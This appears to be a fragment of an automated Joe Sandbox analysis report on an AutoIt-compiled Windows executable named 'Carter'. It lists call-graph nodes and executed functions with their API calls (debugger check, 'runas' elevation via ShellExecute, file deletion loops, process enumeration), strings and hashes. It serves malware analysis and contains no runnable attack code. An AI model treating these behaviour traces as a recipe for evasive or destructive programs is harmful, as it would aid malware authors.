59 API calls 103545->103548 103550 100385c GetStringTypeW _iswctype 103545->103550 103546->103545 103547->103529 103548->103545 103549->103528 103550->103545 103551 10492c8 103552 10492d5 103551->103552 103553 10492db 103551->103553 103554 1002f85 _free 58 API calls 103552->103554 103555 10492ec 103553->103555 103556 1002f85 _free 58 API calls 103553->103556 103554->103553 103557 10492fe 103555->103557 103558 1002f85 _free 58 API calls 103555->103558 103556->103555 103558->103557 103559 fe9a6c 103562 fe829c 103559->103562 103561 fe9a78 103563 fe82b4 103562->103563 103570 fe8308 103562->103570 103564 fe53b0 301 API calls 103563->103564 103563->103570 103568 fe82eb 103564->103568 103566 1020ed8 103566->103566 103567 fe8331 103567->103561 103568->103567 103571 fe523c 59 API calls 103568->103571 103570->103567 103572 104a48d 89 API calls 4 library calls 103570->103572 103571->103570 103572->103566 103573 fe9a88 103576 fe86e0 103573->103576 103577 fe86fd 103576->103577 103578 1020ff8 103577->103578 103579 1020fad 103577->103579 103603 fe8724 103577->103603 103611 105aad0 301 API calls __cinit 103578->103611 103582 1020fb5 103579->103582 103586 1020fc2 103579->103586 103579->103603 103580 fe5278 59 API calls 103580->103603 103609 105b0e4 301 API calls 103582->103609 103583 1002f70 __cinit 67 API calls 103583->103603 103600 fe898d 103586->103600 103610 105b58c 301 API calls 3 library calls 103586->103610 103588 1021289 103588->103588 103589 fe3c30 68 API calls 103589->103603 103590 10211af 103614 105ae3b 89 API calls 103590->103614 103591 fe3f42 68 API calls 103591->103603 103594 fe8a17 103595 fe39be 68 API calls 103595->103603 103600->103594 103615 104a48d 89 API calls 4 library calls 103600->103615 103601 fe53b0 301 API calls 103601->103603 103602 ff1c9c 59 API calls 103602->103603 103603->103580 103603->103583 103603->103589 103603->103590 103603->103591 103603->103594 103603->103595 103603->103600 103603->103601 103603->103602 103605 fe3938 68 API calls 103603->103605 103606 fe855e 301 API calls 103603->103606 103607 fe84e2 89 API calls 103603->103607 103608 fe835f 301 API calls 103603->103608 103612 fe523c 59 API calls 103603->103612 103613 10373ab 59 API calls 103603->103613 103605->103603 103606->103603 103607->103603 103608->103603 103609->103586 103610->103600 103611->103603 103612->103603 103613->103603 103614->103600 103615->103588 103616 fe1066 103621 feaaaa 103616->103621 103618 fe106c 103619 1002f70 __cinit 67 API calls 103618->103619 103620 fe1076 103619->103620 103622 feaacb 103621->103622 103654 10002eb 103622->103654 103626 feab12 103627 ff1207 59 API calls 103626->103627 103628 feab1c 103627->103628 103629 ff1207 59 API calls 103628->103629 103630 feab26 103629->103630 103631 ff1207 59 API calls 103630->103631 103632 feab30 103631->103632 103633 ff1207 59 API calls 103632->103633 103634 feab6e 103633->103634 103635 ff1207 59 API calls 103634->103635 103636 feac39 103635->103636 103664 1000588 103636->103664 103640 feac6b 103641 ff1207 59 API calls 103640->103641 103642 feac75 103641->103642 103692 fffe2b 103642->103692 103644 feacbc 103645 feaccc GetStdHandle 103644->103645 103646 fead18 103645->103646 103647 1022f39 103645->103647 103648 fead20 OleInitialize 103646->103648 103647->103646 103649 1022f42 103647->103649 103648->103618 103699 10470f3 64 API calls Mailbox 103649->103699 103651 1022f49 103700 10477c2 CreateThread 103651->103700 103653 1022f55 CloseHandle 103653->103648 103701 10003c4 103654->103701 103657 10003c4 59 API calls 103658 100032d 103657->103658 103659 ff1207 59 API calls 103658->103659 103660 1000339 103659->103660 103661 ff1821 59 API calls 103660->103661 103662 feaad1 103661->103662 103663 10007bb 6 API calls 103662->103663 103663->103626 103665 ff1207 59 API calls 103664->103665 103666 1000598 103665->103666 103667 ff1207 59 API calls 103666->103667 103668 10005a0 103667->103668 103708 ff10c3 103668->103708 103671 ff10c3 59 API calls 103672 10005b0 103671->103672 103673 ff1207 59 API calls 103672->103673 103674 10005bb 103673->103674 103675 1000fe6 Mailbox 59 API calls 103674->103675 103676 feac43 103675->103676 103677 ffff4c 103676->103677 103678 ffff5a 103677->103678 103679 ff1207 59 API calls 103678->103679 103680 ffff65 103679->103680 103681 ff1207 59 API calls 103680->103681 103682 ffff70 103681->103682 103683 ff1207 59 API calls 103682->103683 103684 ffff7b 103683->103684 103685 ff1207 59 API calls 103684->103685 103686 ffff86 103685->103686 103687 ff10c3 59 API calls 103686->103687 103688 ffff91 103687->103688 103689 1000fe6 Mailbox 59 API calls 103688->103689 103690 ffff98 RegisterWindowMessageW 103689->103690 103690->103640 103693 fffe3b 103692->103693 103694 103620c 103692->103694 103695 1000fe6 Mailbox 59 API calls 103693->103695 103711 104a12a 59 API calls 103694->103711 103697 fffe43 103695->103697 103697->103644 103698 1036217 103699->103651 103700->103653 103712 10477a8 65 API calls 103700->103712 103702 ff1207 59 API calls 103701->103702 103703 10003cf 103702->103703 103704 ff1207 59 API calls 103703->103704 103705 10003d7 103704->103705 103706 ff1207 59 API calls 103705->103706 103707 1000323 103706->103707 103707->103657 103709 ff1207 59 API calls 103708->103709 103710 ff10cb 103709->103710 103710->103671 103711->103698 103713 10201f8 103714 10201fa 103713->103714 103717 1044d18 SHGetFolderPathW 103714->103717 103716 1020203 103716->103716 103718 ff1821 59 API calls 103717->103718 103719 1044d45 103718->103719 103719->103716 103720 101dc5a 103721 1000fe6 Mailbox 59 API calls 103720->103721 103722 101dc61 103721->103722 103724 1000fe6 Mailbox 59 API calls 103722->103724 103726 101dc7a _memmove 103722->103726 103723 1000fe6 Mailbox 59 API calls 103725 101dc9f 103723->103725 103724->103726 103726->103723 103727 ff4d83 103728 ff4dba 103727->103728 103729 ff4dd8 103728->103729 103730 ff4e37 103728->103730 103768 ff4e35 103728->103768 103734 ff4ead PostQuitMessage 103729->103734 103735 ff4de5 103729->103735 103732 10309c2 103730->103732 103733 ff4e3d 103730->103733 103731 ff4e1a DefWindowProcW 103757 ff4e28 103731->103757 103782 fec460 10 API calls Mailbox 103732->103782 103737 ff4e65 SetTimer RegisterWindowMessageW 103733->103737 103738 ff4e42 103733->103738 103734->103757 103739 1030a35 103735->103739 103740 ff4df0 103735->103740 103741 ff4e8e CreatePopupMenu 103737->103741 103737->103757 103746 1030965 103738->103746 103747 ff4e49 KillTimer 103738->103747 103785 1042cce 97 API calls _memset 103739->103785 103742 ff4df8 103740->103742 103743 ff4eb7 103740->103743 103741->103757 103748 ff4e03 103742->103748 103761 1030a1a 103742->103761 103772 ff5b29 103743->103772 103745 10309e9 103783 fec483 301 API calls Mailbox 103745->103783 103752 103096a 103746->103752 103753 103099e MoveWindow 103746->103753 103754 ff5ac3 Shell_NotifyIconW 103747->103754 103755 ff4e9b 103748->103755 103756 ff4e0e 103748->103756 103749 1030a47 103749->103731 103749->103757 103758 103096e 103752->103758 103759 103098d SetFocus 103752->103759 103753->103757 103760 ff4e5c 103754->103760 103780 ff5bd7 107 API calls _memset 103755->103780 103756->103731 103769 ff5ac3 Shell_NotifyIconW 103756->103769 103758->103756 103763 1030977 103758->103763 103759->103757 103779 fe34e4 DeleteObject DestroyWindow Mailbox 103760->103779 103761->103731 103784 1038854 59 API calls Mailbox 103761->103784 103781 fec460 10 API calls Mailbox 103763->103781 103766 ff4eab 103766->103757 103768->103731 103770 1030a0e 103769->103770 103771 ff59d3 94 API calls 103770->103771 103771->103768 103773 ff5bc2 103772->103773 103774 ff5b40 _memset 103772->103774 103773->103757 103775 ff56f8 87 API calls 103774->103775 103777 ff5b67 103775->103777 103776 ff5bab KillTimer SetTimer 103776->103773 103777->103776 103778 1030d6e Shell_NotifyIconW 103777->103778 103778->103776 103779->103757 103780->103766 103781->103757 103782->103745 103783->103756 103784->103768 103785->103749 103786 fe6981 103787 fe373a 59 API calls 103786->103787 103788 fe6997 103787->103788 103793 fe7b3f 103788->103793 103790 fe69bf 103791 fe584d 103790->103791 103805 104a48d 89 API calls 4 library calls 103790->103805 103794 ff162d 59 API calls 103793->103794 103795 fe7b64 _wcscmp 103794->103795 103796 fe7b98 Mailbox 103795->103796 103797 ff1a36 59 API calls 103795->103797 103796->103790 103798 101ffad 103797->103798 103799 ff17e0 59 API calls 103798->103799 103800 101ffb8 103799->103800 103806 fe3938 68 API calls 103800->103806 103802 101ffc9 103804 101ffcd Mailbox 103802->103804 103807 fe523c 59 API calls 103802->103807 103804->103790 103805->103791 103806->103802 103807->103804

                                                                        Executed Functions

                                                                        Function 00FF5240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FF526C
                                                                        • IsDebuggerPresent.KERNEL32 ref: 00FF527E
                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00FF52E6
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                          • Part of subcall function 00FEBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FEBC07
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00FF5366
                                                                        • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 01030B2E
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 01030B66
                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01096D10), ref: 01030BE9
                                                                        • ShellExecuteW.SHELL32(00000000), ref: 01030BF0
                                                                          • Part of subcall function 00FF514C: GetSysColorBrush.USER32(0000000F), ref: 00FF5156
                                                                          • Part of subcall function 00FF514C: LoadCursorW.USER32(00000000,00007F00), ref: 00FF5165
                                                                          • Part of subcall function 00FF514C: LoadIconW.USER32(00000063), ref: 00FF517C
                                                                          • Part of subcall function 00FF514C: LoadIconW.USER32(000000A4), ref: 00FF518E
                                                                          • Part of subcall function 00FF514C: LoadIconW.USER32(000000A2), ref: 00FF51A0
                                                                          • Part of subcall function 00FF514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FF51C6
                                                                          • Part of subcall function 00FF514C: RegisterClassExW.USER32(?), ref: 00FF521C
                                                                          • Part of subcall function 00FF50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FF5109
                                                                          • Part of subcall function 00FF50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FF512A
                                                                          • Part of subcall function 00FF50DB: ShowWindow.USER32(00000000), ref: 00FF513E
                                                                          • Part of subcall function 00FF50DB: ShowWindow.USER32(00000000), ref: 00FF5147
                                                                          • Part of subcall function 00FF59D3: _memset.LIBCMT ref: 00FF59F9
                                                                          • Part of subcall function 00FF59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FF5A9E
                                                                        Strings
                                                                        • runas, xrefs: 01030BE4
                                                                        • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 01030B28
                                                                        • AutoIt, xrefs: 01030B23
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                        • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                        • API String ID: 529118366-2030392706
                                                                        • Opcode ID: ca8c02f40a9d85783b92dfa24319e7bb9c7a726ec3459499bcd896060b5021d5
                                                                        • Instruction ID: 2f11a676bed2f8d2a455396b5b1d91ae952fcc29f65c88f201ce24ae2c0d6197
                                                                        • Opcode Fuzzy Hash: ca8c02f40a9d85783b92dfa24319e7bb9c7a726ec3459499bcd896060b5021d5
                                                                        • Instruction Fuzzy Hash: 73513431E0064CEACF21ABF4DC01EFE7B79AF45740F408199F7D16216ACAAA4504E720
                                                                        Function 01043CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 01000284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FF2A58,?,00008000), ref: 010002A4
                                                                          • Part of subcall function 01044FEC: GetFileAttributesW.KERNEL32(?,01043BFE), ref: 01044FED
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 01043D96
                                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 01043E3E
                                                                        • MoveFileW.KERNEL32(?,?), ref: 01043E51
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 01043E6E
                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 01043E90
                                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 01043EAC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                        • String ID: \*.*
                                                                        • API String ID: 4002782344-1173974218
                                                                        • Opcode ID: 6f8d258427c5a1340b334e653a597a6eca0d6fe08571d34a879355254993ed63
                                                                        • Instruction ID: 906ed1386fa1686dfc87f64ef79725517be8161ac3a46659097d9b86134fe2d2
                                                                        • Opcode Fuzzy Hash: 6f8d258427c5a1340b334e653a597a6eca0d6fe08571d34a879355254993ed63
                                                                        • Instruction Fuzzy Hash: 12516E7180111DABCB25EBA0DD929FDB7B9BF11300F2042A5E582B71A5EB356F09DB60
                                                                        Function 00FF5D13 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 958 ff5d13-ff5d73 call ff1207 GetVersionExW call ff1821 963 ff5d79 958->963 964 ff5e78-ff5e7a 958->964 966 ff5d7c-ff5d81 963->966 965 1030fa9-1030fb5 964->965 967 1030fb6-1030fba 965->967 968 ff5e7f-ff5e80 966->968 969 ff5d87 966->969 971 1030fbd-1030fc9 967->971 972 1030fbc 967->972 970 ff5d88-ff5dbf call ff1981 call ff133d 968->970 969->970 981 ff5dc5-ff5dc6 970->981 982 1031098-103109b 970->982 971->967 974 1030fcb-1030fd0 971->974 972->971 974->966 975 1030fd6-1030fdd 974->975 975->965 977 1030fdf 975->977 980 1030fe4-1030fea 977->980 983 ff5e00-ff5e17 GetCurrentProcess IsWow64Process 980->983 984 ff5dcc-ff5dcf 981->984 985 1030fef-1030ffa 981->985 986 10310b4-10310b8 982->986 987 103109d 982->987 992 ff5e1c-ff5e2d 983->992 993 ff5e19 983->993 984->983 990 ff5dd1-ff5def 984->990 988 1031017-1031019 985->988 989 1030ffc-1031002 985->989 994 10310a3-10310ac 986->994 995 10310ba-10310c3 986->995 991 10310a0 987->991 999 103101b-1031027 988->999 1000 103103c-103103f 988->1000 996 1031004-1031007 989->996 997 103100c-1031012 989->997 990->983 998 ff5df1-ff5df7 990->998 991->994 1002 ff5e2f-ff5e3f call ff55f0 992->1002 1003 ff5e98-ff5ea2 GetSystemInfo 992->1003 993->992 994->986 995->991 1001 10310c5-10310c8 995->1001 996->983 997->983 998->980 1004 ff5dfd 998->1004 1005 1031031-1031037 999->1005 1006 1031029-103102c 999->1006 1008 1031041-1031050 1000->1008 1009 1031065-1031068 1000->1009 1001->994 1017 ff5e8c-ff5e96 GetSystemInfo 1002->1017 1018 ff5e41-ff5e4e call ff55f0 1002->1018 1007 ff5e65-ff5e75 1003->1007 1004->983 1005->983 1006->983 1012 1031052-1031055 1008->1012 1013 103105a-1031060 1008->1013 1009->983 1011 103106e-1031083 1009->1011 1015 1031085-1031088 1011->1015 1016 103108d-1031093 1011->1016 1012->983 1013->983 1015->983 1016->983 1020 ff5e56-ff5e5a 1017->1020 1023 ff5e85-ff5e8a 1018->1023 1024 ff5e50-ff5e54 GetNativeSystemInfo 1018->1024 1020->1007 1022 ff5e5c-ff5e5f FreeLibrary 1020->1022 1022->1007 1023->1024 1024->1020
                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(?), ref: 00FF5D40
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                        • GetCurrentProcess.KERNEL32(?,01070A18,00000000,00000000,?), ref: 00FF5E07
                                                                        • IsWow64Process.KERNEL32(00000000), ref: 00FF5E0E
                                                                        • GetNativeSystemInfo.KERNEL32(00000000), ref: 00FF5E54
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00FF5E5F
                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00FF5E90
                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00FF5E9C
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                        • String ID:
                                                                        • API String ID: 1986165174-0
                                                                        • Opcode ID: 5d53cba0a5f8f3dc6f2bd43776191edeb01df72735ed68be04c0adefa278b513
                                                                        • Instruction ID: dbf6a036c07aeda899fb20f17207b1b8ce04d22fd56b09743e197f366bd7fa2a
                                                                        • Opcode Fuzzy Hash: 5d53cba0a5f8f3dc6f2bd43776191edeb01df72735ed68be04c0adefa278b513
                                                                        • Instruction Fuzzy Hash: A991E63194ABC4DEC731CB7894501BAFFE56F2A300B884A9EE2C797B12D235A508D759
                                                                        Function 01044005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1025 1044005-104404c call ff1207 * 3 call 1000284 call 1044fec 1036 104405c-104408d call 1000119 FindFirstFileW 1025->1036 1037 104404e-1044057 call ff1900 1025->1037 1041 10440fc-1044103 FindClose 1036->1041 1042 104408f-1044091 1036->1042 1037->1036 1043 1044107-1044129 call ff1cb6 * 3 1041->1043 1042->1041 1044 1044093-1044098 1042->1044 1046 10440d7-10440e9 FindNextFileW 1044->1046 1047 104409a-10440d5 call ff1c9c call ff17e0 call ff1900 DeleteFileW 1044->1047 1046->1042 1050 10440eb-10440f1 1046->1050 1047->1046 1060 10440f3-10440fa FindClose 1047->1060 1050->1042 1060->1043
                                                                        APIs
                                                                          • Part of subcall function 01000284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FF2A58,?,00008000), ref: 010002A4
                                                                          • Part of subcall function 01044FEC: GetFileAttributesW.KERNEL32(?,01043BFE), ref: 01044FED
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0104407C
                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 010440CC
                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 010440DD
                                                                        • FindClose.KERNEL32(00000000), ref: 010440F4
                                                                        • FindClose.KERNEL32(00000000), ref: 010440FD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                        • String ID: \*.*
                                                                        • API String ID: 2649000838-1173974218
                                                                        • Opcode ID: 99195756d58f707dc2899a878fbba36eec6974351b3c0c8816cbe6503f705a46
                                                                        • Instruction ID: 3233e4d53bcf908e355854fd7d2c69f18de81b7d593b7c71e4d382b6a780847c
                                                                        • Opcode Fuzzy Hash: 99195756d58f707dc2899a878fbba36eec6974351b3c0c8816cbe6503f705a46
                                                                        • Instruction Fuzzy Hash: A031A171008349DBC311EF64C8919FFB7E8BE92200F404A2DF5E1D21A5EB39DA09D7A2
                                                                        Function 01044148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0104416D
                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0104417B
                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0104419B
                                                                        • CloseHandle.KERNEL32(00000000), ref: 01044245
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 420147892-0
                                                                        • Opcode ID: 3bbb1dc3b4dd7e084703e6a9cabc9c675586b05b38b88e8258d9ffc8445c0f21
                                                                        • Instruction ID: e0b0cce7af4bfdcb5adf641e04411acdf9d845b2305951d2f31ef52cd309f2a8
                                                                        • Opcode Fuzzy Hash: 3bbb1dc3b4dd7e084703e6a9cabc9c675586b05b38b88e8258d9ffc8445c0f21
                                                                        • Instruction Fuzzy Hash: 4E31BFB11083459BD310EF64E885BBFBBE8BF85340F40062DF6C5D21A1EB75AA49CB52
                                                                        Function 00FEB020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF3740: CharUpperBuffW.USER32(?,010A71DC,00000002,?,00000000,010A71DC,?,00FE53A5,?,?,?,?), ref: 00FF375D
                                                                        • _memmove.LIBCMT ref: 00FEB68A
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper_memmove
                                                                        • String ID:
                                                                        • API String ID: 2819905725-0
                                                                        • Opcode ID: 4dd62541ca133d3fdfebae1b5a6c6d60d4c52aa7614df38ea456bba83d841797
                                                                        • Instruction ID: 6032a615082ec2c32359fe2c03a566576b6c747e37e56ef0aabee63f680ec212
                                                                        • Opcode Fuzzy Hash: 4dd62541ca133d3fdfebae1b5a6c6d60d4c52aa7614df38ea456bba83d841797
                                                                        • Instruction Fuzzy Hash: 1CA29B71A08391CFD721CF19C480B2BB7E1BF88314F14896DE99A8B361D779E845DB92
                                                                        Function 0104494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNEL32(?,0102FC86), ref: 0104495A
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0104496B
                                                                        • FindClose.KERNEL32(00000000), ref: 0104497B
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                        • String ID:
                                                                        • API String ID: 48322524-0
                                                                        • Opcode ID: c24c6290ed47c34a76ad2fb6eb9dd109b72f2bc402e12f6f187f832598f7a912
                                                                        • Instruction ID: 959937e59f78511a3b77278b39ca7326a95bd4a5a7e45b3f834674e260b47be2
                                                                        • Opcode Fuzzy Hash: c24c6290ed47c34a76ad2fb6eb9dd109b72f2bc402e12f6f187f832598f7a912
                                                                        • Instruction Fuzzy Hash: 27E0DF76821506AB8220663CEC8D8EA779C9E07239F100B65F8B5D20C8EB74AD449796
                                                                        Function 00FE94E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e9190d870ceb0090d92ad782eb09280349806ea85adbccbf3feb508b00d3326a
                                                                        • Instruction ID: aec8e5f5a2eae778f56f14c89bff70984b5d034f90efc53a433dc73a8239c631
